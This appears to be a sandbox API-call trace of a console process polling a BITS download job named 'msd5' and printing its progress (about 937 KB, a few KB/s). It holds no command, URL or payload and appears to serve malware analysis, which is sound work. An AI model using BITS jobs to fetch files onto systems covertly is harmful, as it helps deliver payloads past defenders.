[0066.736] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.737] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e920 | out: lpConsoleScreenBufferInfo=0x6e920) returned 1
[0066.737] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e938, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e938*=0x8) returned 1
[0066.737] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.737] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e914 | out: lpConsoleScreenBufferInfo=0x6e914) returned 1
[0066.738] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x6e92c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e92c*=0xc) returned 1
[0066.738] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.738] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e924 | out: lpConsoleScreenBufferInfo=0x6e924) returned 1
[0066.738] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6e93c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e93c*=0xa) returned 1
[0066.739] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.739] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e90c | out: lpConsoleScreenBufferInfo=0x6e90c) returned 1
[0066.739] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6e924, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e924*=0xa) returned 1
[0066.739] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.740] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e914 | out: lpConsoleScreenBufferInfo=0x6e914) returned 1
[0066.740] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e92c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e92c*=0x8) returned 1
[0066.740] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.740] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e938 | out: _Buffer="0") returned 1
[0066.740] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e944 | out: _Buffer="1") returned 1
[0066.740] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e914 | out: lpConsoleScreenBufferInfo=0x6e914) returned 1
[0066.741] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6e92c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e92c*=0x5) returned 1
[0066.741] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.741] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e91c | out: lpConsoleScreenBufferInfo=0x6e91c) returned 1
[0066.741] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e934, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e934*=0x8) returned 1
[0066.742] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.742] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e940 | out: _Buffer="0") returned 1
[0066.742] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6e934 | out: lpSystemTimeAsFileTime=0x6e934*(dwLowDateTime=0xd871e410, dwHighDateTime=0x1d469c7))
[0066.742] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6e92c | out: lpSystemTimeAsFileTime=0x6e92c*(dwLowDateTime=0xd871e410, dwHighDateTime=0x1d469c7))
[0066.742] _finite (_X=0x0) returned 0
[0066.742] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e8ec | out: lpConsoleScreenBufferInfo=0x6e8ec) returned 1
[0066.742] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x6e904, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e904*=0xd) returned 1
[0066.743] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.743] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e8f8 | out: lpConsoleScreenBufferInfo=0x6e8f8) returned 1
[0066.743] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x6e910, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e910*=0xf) returned 1
[0066.743] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.744] _vsnwprintf (in: _Buffer=0x6e724, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x6e6e8 | out: _Buffer="0.00 B/S") returned 8
[0066.744] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e93c | out: lpConsoleScreenBufferInfo=0x6e93c) returned 1
[0066.744] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e954, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e954*=0x8) returned 1
[0066.744] CoTaskMemFree (pv=0x208398)
[0066.745] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0066.745] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0066.745] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x6f9d8 | out: lpMode=0x6f9d8) returned 1
[0066.745] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0066.746] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x6fa18*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0066.906] PeekMessageW (in: lpMsg=0x6f9f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6f9f0) returned 1
[0066.906] TranslateMessage (lpMsg=0x6f9f0) returned 0
[0066.906] DispatchMessageW (lpMsg=0x6f9f0) returned 0x1
[0066.906] IBackgroundCopyCallback:JobModification (This=0x210cb0, pJob=0x1fa6b4, dwReserved=0x0) returned 0x0
[0066.906] IBackgroundCopyJob:GetState (in: This=0x1fa624, pVal=0x210cbc | out: pVal=0x210cbc) returned 0x0
[0066.919] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fc4
[0066.919] IBackgroundCopyJob:GetType (in: This=0x1fa624, pVal=0x6f0b8 | out: pVal=0x6f0b8) returned 0x0
[0066.920] IBackgroundCopyCallback:JobModification (This=0x210cb0, pJob=0x1fa6b4, dwReserved=0x0) returned 0x0
[0066.920] IBackgroundCopyJob:GetState (in: This=0x1fa624, pVal=0x210cbc | out: pVal=0x210cbc) returned 0x0
[0066.921] IBackgroundCopyJob:GetProgress (in: This=0x1fa624, pVal=0x210cc0 | out: pVal=0x210cc0) returned 0x0
[0066.922] IBackgroundCopyJob:GetPriority (in: This=0x1fa624, pVal=0x6f0b4 | out: pVal=0x6f0b4) returned 0x0
[0066.923] CoTaskMemFree (pv=0x0)
[0066.923] IBackgroundCopyJob:GetDisplayName (in: This=0x1fa624, pVal=0x6f0cc | out: pVal=0x6f0cc*="msd5") returned 0x0
[0066.923] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f074 | out: lpConsoleScreenBufferInfo=0x6f074) returned 1
[0066.924] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6f08c | out: lpNumberOfCharsWritten=0x6f08c) returned 1
[0066.924] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6f08c | out: lpNumberOfAttrsWritten=0x6f08c) returned 1
[0066.924] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0066.924] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.925] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f060 | out: lpConsoleScreenBufferInfo=0x6f060) returned 1
[0066.925] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f078, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f078*=0xa) returned 1
[0066.925] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.925] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f05c | out: lpConsoleScreenBufferInfo=0x6f05c) returned 1
[0066.926] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f074, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f074*=0x5) returned 1
[0066.926] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.926] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f064 | out: lpConsoleScreenBufferInfo=0x6f064) returned 1
[0066.926] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6f07c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f07c*=0x7) returned 1
[0066.927] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.927] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f058 | out: lpConsoleScreenBufferInfo=0x6f058) returned 1
[0066.927] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f070, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f070*=0x8) returned 1
[0066.927] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.928] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f060 | out: lpConsoleScreenBufferInfo=0x6f060) returned 1
[0066.928] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f078, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f078*=0x8) returned 1
[0066.928] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.928] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f054 | out: lpConsoleScreenBufferInfo=0x6f054) returned 1
[0066.928] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x6f06c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f06c*=0xc) returned 1
[0066.929] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.929] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f064 | out: lpConsoleScreenBufferInfo=0x6f064) returned 1
[0066.929] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f07c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f07c*=0xa) returned 1
[0066.929] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.930] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f04c | out: lpConsoleScreenBufferInfo=0x6f04c) returned 1
[0066.930] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f064, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f064*=0xa) returned 1
[0066.930] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.930] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f054 | out: lpConsoleScreenBufferInfo=0x6f054) returned 1
[0066.931] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f06c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f06c*=0x8) returned 1
[0066.931] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.931] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f078 | out: _Buffer="0") returned 1
[0066.931] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f084 | out: _Buffer="1") returned 1
[0066.931] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f054 | out: lpConsoleScreenBufferInfo=0x6f054) returned 1
[0066.931] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f06c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f06c*=0x5) returned 1
[0066.932] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.932] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f05c | out: lpConsoleScreenBufferInfo=0x6f05c) returned 1
[0066.932] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f074, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f074*=0x8) returned 1
[0066.932] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.932] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f080 | out: _Buffer="0") returned 1
[0066.933] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f084 | out: _Buffer="937984") returned 6
[0066.933] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f080 | out: _Buffer="0") returned 1
[0066.933] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6f06c | out: lpSystemTimeAsFileTime=0x6f06c*(dwLowDateTime=0xd890d5f0, dwHighDateTime=0x1d469c7))
[0066.933] _finite (_X=0x0) returned 1
[0066.933] _finite (_X=0x0) returned 1
[0066.933] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f02c | out: lpConsoleScreenBufferInfo=0x6f02c) returned 1
[0066.938] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x6f044, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f044*=0x11) returned 1
[0066.938] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.938] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f038 | out: lpConsoleScreenBufferInfo=0x6f038) returned 1
[0066.938] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x6f050, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f050*=0xf) returned 1
[0066.939] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.939] _vsnwprintf (in: _Buffer=0x6ee64, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x6ee28 | out: _Buffer="0.00 B/S") returned 8
[0066.939] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f07c | out: lpConsoleScreenBufferInfo=0x6f07c) returned 1
[0066.939] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f094, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f094*=0x8) returned 1
[0066.939] CoTaskMemFree (pv=0x2083c0)
[0066.940] PeekMessageW (in: lpMsg=0x6f9f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6f9f0) returned 0
[0066.940] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x6fa18*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0067.584] PeekMessageW (in: lpMsg=0x6f9f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6f9f0) returned 1
[0067.584] TranslateMessage (lpMsg=0x6f9f0) returned 0
[0067.584] DispatchMessageW (lpMsg=0x6f9f0) returned 0x1
[0067.584] IBackgroundCopyCallback:JobModification (This=0x210cb0, pJob=0x1fa6b4, dwReserved=0x0) returned 0x0
[0067.584] IBackgroundCopyJob:GetState (in: This=0x1fa624, pVal=0x210cbc | out: pVal=0x210cbc) returned 0x0
[0067.585] KillTimer (hWnd=0x0, uIDEvent=0x7fc4) returned 1
[0067.585] IBackgroundCopyJob:GetType (in: This=0x1fa624, pVal=0x6f0b8 | out: pVal=0x6f0b8) returned 0x0
[0067.586] IBackgroundCopyJob:GetProgress (in: This=0x1fa624, pVal=0x210cc0 | out: pVal=0x210cc0) returned 0x0
[0067.587] IBackgroundCopyJob:GetPriority (in: This=0x1fa624, pVal=0x6f0b4 | out: pVal=0x6f0b4) returned 0x0
[0067.588] CoTaskMemFree (pv=0x0)
[0067.588] IBackgroundCopyJob:GetDisplayName (in: This=0x1fa624, pVal=0x6f0cc | out: pVal=0x6f0cc*="msd5") returned 0x0
[0067.589] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f074 | out: lpConsoleScreenBufferInfo=0x6f074) returned 1
[0067.589] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6f08c | out: lpNumberOfCharsWritten=0x6f08c) returned 1
[0067.589] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6f08c | out: lpNumberOfAttrsWritten=0x6f08c) returned 1
[0067.589] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0067.590] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0067.590] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f060 | out: lpConsoleScreenBufferInfo=0x6f060) returned 1
[0067.590] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f078, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f078*=0xa) returned 1
[0067.590] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0067.590] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f05c | out: lpConsoleScreenBufferInfo=0x6f05c) returned 1
[0067.591] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f074, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f074*=0x5) returned 1
[0067.591] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0067.591] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f064 | out: lpConsoleScreenBufferInfo=0x6f064) returned 1
[0067.591] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6f07c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f07c*=0x7) returned 1
[0067.591] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0067.592] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f058 | out: lpConsoleScreenBufferInfo=0x6f058) returned 1
[0067.592] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f070, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f070*=0x8) returned 1
[0067.592] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0067.592] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f060 | out: lpConsoleScreenBufferInfo=0x6f060) returned 1
[0067.593] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f078, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f078*=0x8) returned 1
[0067.593] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0067.593] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f054 | out: lpConsoleScreenBufferInfo=0x6f054) returned 1
[0067.593] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x6f06c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f06c*=0xe) returned 1
[0067.593] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0067.594] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f064 | out: lpConsoleScreenBufferInfo=0x6f064) returned 1
[0067.594] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f07c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f07c*=0xa) returned 1
[0067.594] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0067.594] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f04c | out: lpConsoleScreenBufferInfo=0x6f04c) returned 1
[0067.594] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f064, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f064*=0xa) returned 1
[0067.595] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0067.595] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f054 | out: lpConsoleScreenBufferInfo=0x6f054) returned 1
[0067.595] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f06c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f06c*=0x8) returned 1
[0067.595] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0067.596] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f078 | out: _Buffer="0") returned 1
[0067.596] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f084 | out: _Buffer="1") returned 1
[0067.596] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f054 | out: lpConsoleScreenBufferInfo=0x6f054) returned 1
[0067.596] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f06c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f06c*=0x5) returned 1
[0067.596] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0067.596] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f05c | out: lpConsoleScreenBufferInfo=0x6f05c) returned 1
[0067.597] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f074, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f074*=0x8) returned 1
[0067.597] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0067.597] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f080 | out: _Buffer="3568") returned 4
[0067.597] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f084 | out: _Buffer="937984") returned 6
[0067.597] _vsnwprintf (in: _Buffer=0xc303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f080 | out: _Buffer="0") returned 1
[0067.597] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6f06c | out: lpSystemTimeAsFileTime=0x6f06c*(dwLowDateTime=0xd8f4cfb0, dwHighDateTime=0x1d469c7))
[0067.597] _finite (_X=0xbfeca2a1) returned 1
[0067.597] _finite (_X=0xd97e7d47) returned 1
[0067.597] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f02c | out: lpConsoleScreenBufferInfo=0x6f02c) returned 1
[0067.597] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x6f044, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f044*=0x14) returned 1
[0067.598] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0067.598] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f038 | out: lpConsoleScreenBufferInfo=0x6f038) returned 1
[0067.598] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x6f050, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6f050*=0xf) returned 1
[0067.598] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0067.599] _vsnwprintf (in: _Buffer=0x6ee64, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x6ee28 | out: _Buffer="3.72 KB/S") returned 9
[0067.599] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f030 | out: lpConsoleScreenBufferInfo=0x6f030) returned 1
